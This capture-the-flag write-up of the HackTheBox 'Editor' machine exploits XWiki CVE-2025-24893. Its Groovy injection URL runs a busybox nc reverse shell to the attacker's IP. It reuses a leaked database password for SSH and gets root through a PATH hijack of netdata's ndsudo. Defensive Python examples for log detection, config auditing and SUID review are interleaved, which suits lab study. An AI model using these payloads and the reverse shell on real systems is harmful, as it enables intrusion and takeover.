[hackthebox] Editor

1. Port scan and host information

Port scan with naabu:

```
./naabu -host 10.10.11.80 -p 21,22,23,1433,1521,3306,3389,5432,5900,50070,50030,50000,27017,27018,11211,9200,9300,7001,7002,6379,5984,873,443,8000-9090,80-89,80,10000,8888,8649,8083,8080,8089,9090,7778,7001,7002,608

__
___ ___ ___ _/ / __ __
/ _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

projectdiscovery.io

[INF] Current naabu version 2.3.5 (outdated)
[WRN] UI Dashboard is disabled, Use -dashboard option to enable
[INF] Running CONNECT scan with non root privileges
10.10.11.80:22
10.10.11.80:8080
10.10.11.80:80
[INF] Found 3 ports on host 10.10.11.80 (10.10.11.80)
```

Scan results:

  • Open ports: 22, 8080, 80

2. Hostname resolution records

The hostname resolution records are missing here; this information still needs to be added.


3. Vulnerability information and exploitation

The marked version has a known historical vulnerability:

https://github.com/gunzf0x/CVE-2025-24893

Exploitation:

```
~/桌/CVE-2025-24893-main ▓▒░ python3 CVE-2025-24893.py -t 'http://10.10.11.80:8080' -c 'busybox nc 10.10.16.65 9001 -e /bin/bash'
[*] Attacking http://10.10.11.80:8080
[*] Injecting the payload:
http://10.10.11.80:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.16.65%209001%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed

~Happy Hacking
```
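From the defender's side, the injected request above is easy to spot in web server logs: a GET to the SolrSearch page whose `text` parameter closes the enclosing macro with `}}` and opens `{{async}}` / `{{groovy}}` macros. The following detector is an added example, not part of this write-up or of XWiki; the access-log lines are constructed, and the second one mirrors the payload shape above with a harmless `println` in place of the command.

```python
"""Detect XWiki SolrSearch macro-injection attempts in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common Log Format: client, ident, user, [timestamp], "METHOD path PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Script macros that turn a search string into executable code when XWiki renders it.
SUSPICIOUS_MACROS = ("{{groovy}}", "{{async", "{{velocity}}", "{{python}}")


def suspicious_macros(path: str) -> list[str]:
    """Return the suspicious macros present in the `text` parameter of a SolrSearch
    request path (in SUSPICIOUS_MACROS order), or an empty list for anything else."""
    parts = urlsplit(path)
    if not parts.path.endswith("/SolrSearch"):
        return []
    # parse_qs percent-decodes once; decode again in case the payload was double-encoded
    values = [unquote(v) for v in parse_qs(parts.query).get("text", [])]
    return [m for m in SUSPICIOUS_MACROS if any(m in v for v in values)]


def scan_access_log(lines) -> list[tuple[str, int, list[str]]]:
    """Return (client_ip, status, macros) for every request carrying a suspicious macro."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        macros = suspicious_macros(m.group("path"))
        if macros:
            findings.append((m.group("ip"), int(m.group("status")), macros))
    return findings


# Constructed sample log. Line 2 follows the injection shape from the write-up.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=installation+guide HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22hi%22%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Jan/2025:10:00:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for ip, status, macros in scan_access_log(SAMPLE_LOG):
        print(f"{ip} status={status} macros={macros}")
```

A status of 200 on a flagged line is the important signal: the macro was rendered, not rejected, so the host should be treated as compromised until the XWiki instance is confirmed patched.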

Reverse shell:

```
└─# nc -lvvp 9001
listening on [any] 9001 ...
connect to [10.10.16.65] from editor.htb [10.10.11.80] 32812
python3 -c 'import pty;pty.spawn("/bin/bash")'
xwiki@editor:/usr/lib/xwiki-jetty$
```

4. Sensitive information collection

Directory structure and configuration files:

```
xwiki@editor:/usr/lib/xwiki/WEB-INF$ ls
cache                           jetty-web.xml  version.properties
classes                         lib            web.xml
fonts                           observation    xwiki.cfg
hibernate.cfg.xml               portlet.xml    xwiki-locales.txt
jboss-deployment-structure.xml  sun-web.xml    xwiki.properties
```

The Hibernate configuration file may contain:

  • the database address
  • the database username and password (plaintext in older versions)

Example content:

```xml
<property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&connectionTimeZone=LOCAL&allowPublicKeyRetrieval=true</property>
<property name="hibernate.connection.username">xwiki</property>
<property name="hibernate.connection.password">theEd1t0rTeam99</property>
<property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
...
```
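Two weaknesses are visible in that file: a literal database password, and `useSSL=false` on the JDBC URL. The audit below is an added example (not from this write-up and not XWiki code) that flags both; the XML fragment is constructed in the same shape as the file above with a dummy password, and the `${...}` placeholder convention for a secret injected at startup is an assumption rather than an XWiki feature.

```python
"""Audit an XWiki hibernate.cfg.xml for stored secrets and weak connection settings (added example)."""
import xml.etree.ElementTree as ET

# Values that look like runtime references rather than literal secrets (assumed conventions).
PLACEHOLDER_PREFIXES = ("${", "#{", "ENC(")


def audit_hibernate_config(xml_text: str) -> list[tuple[str, str]]:
    """Return (property name, issue) pairs for a plaintext password and a JDBC URL with TLS off."""
    root = ET.fromstring(xml_text)
    props = {p.get("name", ""): (p.text or "").strip() for p in root.iter("property")}
    findings = []
    password = props.get("hibernate.connection.password", "")
    if password and not password.startswith(PLACEHOLDER_PREFIXES):
        findings.append(("hibernate.connection.password", "plaintext database password stored in the config file"))
    url = props.get("hibernate.connection.url", "")
    if "usessl=false" in url.lower():
        findings.append(("hibernate.connection.url", "useSSL=false: database traffic is not encrypted"))
    return findings


# Constructed fragment; the password is a dummy value, not the one from the box.
WEAK_CONFIG = """<hibernate-configuration>
  <session-factory>
    <property name="hibernate.connection.url">jdbc:mysql://localhost/xwiki?useSSL=false&amp;connectionTimeZone=LOCAL</property>
    <property name="hibernate.connection.username">xwiki</property>
    <property name="hibernate.connection.password">example-not-real</property>
    <property name="hibernate.connection.driver_class">com.mysql.cj.jdbc.Driver</property>
  </session-factory>
</hibernate-configuration>
"""

# The same file with the secret supplied at startup and TLS required.
HARDENED_CONFIG = WEAK_CONFIG.replace("example-not-real", "${XWIKI_DB_PASSWORD}").replace("useSSL=false", "useSSL=true")

if __name__ == "__main__":
    for cfg in (WEAK_CONFIG, HARDENED_CONFIG):
        print(audit_hibernate_config(cfg) or "no findings")
```

On this box the same password also opened an SSH session, so after a leak like this both the database account and every user account sharing the secret need rotation, not just the one in the file.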

5. Lateral movement and privilege escalation

Try SSH login with the database password:


6. SUID file check and privilege-escalation approach

List of common SUID files with notes:

```
SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwsr-x--- 1 root netdata 943K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 1.4M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin (Unknown SUID binary!)
ICMP is not accessible
-rwsr-x--- 1 root netdata 1.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/local-listeners (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 196K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 80K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ioping (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 876K Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin (Unknown SUID binary!)
-rwsr-x--- 1 root netdata 4.1M Apr 1 2024 /opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin (Unknown SUID binary!)
-rwsr-xr-x 1 root root 40K Feb 6 2024 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 71K Feb 6 2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 55K Apr 9 2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr 9 2024 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K Feb 6 2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Mar 23 2022 /usr/bin/fusermount3
-rwsr-xr-x 1 root root 227K Jun 25 12:48 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 59K Feb 6 2024 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 47K Apr 9 2024 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 72K Feb 6 2024 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-- 1 root messagebus 35K Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 331K Apr 11 2025 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Feb 26 2022 /usr/libexec/polkit-agent-helper-1
```

Points of interest:

  • several unknown SUID binaries under /opt/netdata
  • check the usual escalation candidates such as sudo and passwd
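The same check, run as a routine hardening audit rather than from an attacker's shell, is what should have surfaced the /opt/netdata helpers before the box was built. The script below is an added example, not this write-up's or linpeas' code: it walks the filesystem for set-uid/set-gid files and reports anything outside the package-managed directories as unknown. The list of trusted prefixes is an assumption for a stock Debian/Ubuntu layout.

```python
"""Enumerate set-uid/set-gid binaries and flag those outside package-managed paths (added example)."""
import os
import stat
import tempfile

# Assumed package-managed locations on a stock Debian/Ubuntu system.
TRUSTED_PREFIXES = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/", "/bin/", "/sbin/")
# Pseudo-filesystems that are never worth walking.
SKIP_PREFIXES = ("/proc", "/sys", "/dev", "/run")


def find_setid_files(root: str = "/") -> list[str]:
    """Return regular files under `root` carrying the set-uid or set-gid bit, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath.startswith(SKIP_PREFIXES):
            dirnames[:] = []  # prune: do not descend into pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(path)
    return sorted(hits)


def classify(path: str) -> str:
    """'known-location' inside package-managed directories, otherwise 'unknown'."""
    return "known-location" if path.startswith(TRUSTED_PREFIXES) else "unknown"


def audit(root: str = "/") -> list[tuple[str, str, int]]:
    """(path, classification, permission bits) for every set-id file, unknown ones first."""
    rows = [(p, classify(p), stat.S_IMODE(os.lstat(p).st_mode)) for p in find_setid_files(root)]
    return sorted(rows, key=lambda r: (r[1] != "unknown", r[0]))


def self_check() -> list[tuple[str, str]]:
    """Build a throwaway tree with one set-uid file and one plain file, then audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        setid = os.path.join(tmp, "helper")
        plain = os.path.join(tmp, "plain")
        for p in (setid, plain):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        os.chmod(setid, 0o4755)  # set-uid bit set on a file we own
        os.chmod(plain, 0o755)
        return [(os.path.basename(p), kind) for p, kind, _ in audit(tmp)]


if __name__ == "__main__":
    for path, kind, mode in audit("/"):
        print(f"{kind:14} {oct(mode)} {path}")
```

Every "unknown" hit deserves the question the rest of this write-up answers for ndsudo: what does the binary execute, and does it trust anything the unprivileged caller controls.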

7. Final privilege escalation

**Privilege escalation via the SUID file:** https://github.com/AzureADTrent/CVE-2024-32019-POC

```
oliver@editor:/tmp$ chmod +x nvme
oliver@editor:/tmp$ export PATH=/tmp:$PATH
oliver@editor:/tmp$
oliver@editor:/tmp$ /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
root@editor:/tmp#
```
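The step above works because the set-uid helper runs an external tool by bare name and the caller can put a directory of their own first in PATH. The example below is added here and is not netdata's code: `resolve_via_env_path` is the lookup that goes wrong, and `resolve_hardened` is the fix a privileged helper should use instead, a closed table of sub-commands mapped to absolute paths, a fixed search path, and an ownership/permission check on the target before anything is executed. The command table and the paths in it are assumptions; nothing privileged is run.

```python
"""Why a set-uid helper must not locate sub-commands through the caller's PATH (added example)."""
import os
import stat
import tempfile
from typing import Optional

FIXED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"
# Sub-command -> argv. Only these may run, always from absolute paths (assumed table).
ALLOWED = {
    "nvme-list": ["/usr/sbin/nvme", "list", "--output-format=json"],
    "smartctl-scan": ["/usr/sbin/smartctl", "--scan"],
}


def resolve_via_env_path(name: str, env: dict) -> Optional[str]:
    """The unsafe pattern: first match for `name` along the caller-supplied PATH."""
    for directory in env.get("PATH", "").split(":"):
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate):
            return candidate
    return None


def trusted_executable(path: str) -> bool:
    """Accept only a root-owned regular file that group and others cannot write."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return (
        stat.S_ISREG(st.st_mode)
        and st.st_uid == 0
        and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    )


def resolve_hardened(subcommand: str) -> list[str]:
    """Map a sub-command to its fixed argv; refuse anything outside the allow-list."""
    argv = ALLOWED.get(subcommand)
    if argv is None:
        raise PermissionError(f"sub-command not allowed: {subcommand!r}")
    exe = argv[0]
    if not os.path.isabs(exe) or os.path.dirname(exe) not in FIXED_PATH.split(":"):
        raise PermissionError(f"refusing non-absolute or off-path executable: {exe}")
    if not trusted_executable(exe):
        raise PermissionError(f"executable missing, not root-owned, or writable: {exe}")
    return argv


def clean_environment() -> dict:
    """Environment to exec with: nothing inherited from the caller, PATH pinned."""
    return {"PATH": FIXED_PATH, "LANG": "C"}


def demo() -> tuple[bool, bool]:
    """In a throwaway directory: does the env-PATH lookup land on the planted file,
    and does the hardened check reject that file?"""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "nvme")
        with open(planted, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(planted, 0o777)  # world-writable, as a file dropped in /tmp would be
        caller_env = {"PATH": f"{tmp}:{FIXED_PATH}"}
        hijacked = os.path.dirname(resolve_via_env_path("nvme", caller_env) or "") == tmp
        rejected = not trusted_executable(planted)
        return (hijacked, rejected)


if __name__ == "__main__":
    print("env-PATH lookup hijacked, hardened check rejected:", demo())
```

Pinning PATH alone is not enough if the helper still takes the executable name from the caller; the allow-list is what removes the caller's influence over which file runs.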

Summary:

  • Completed port and host information collection
  • Exploited the vulnerability to obtain an initial shell
  • Found sensitive information in a configuration file and used it to log in laterally
  • Checked SUID files and escalated to root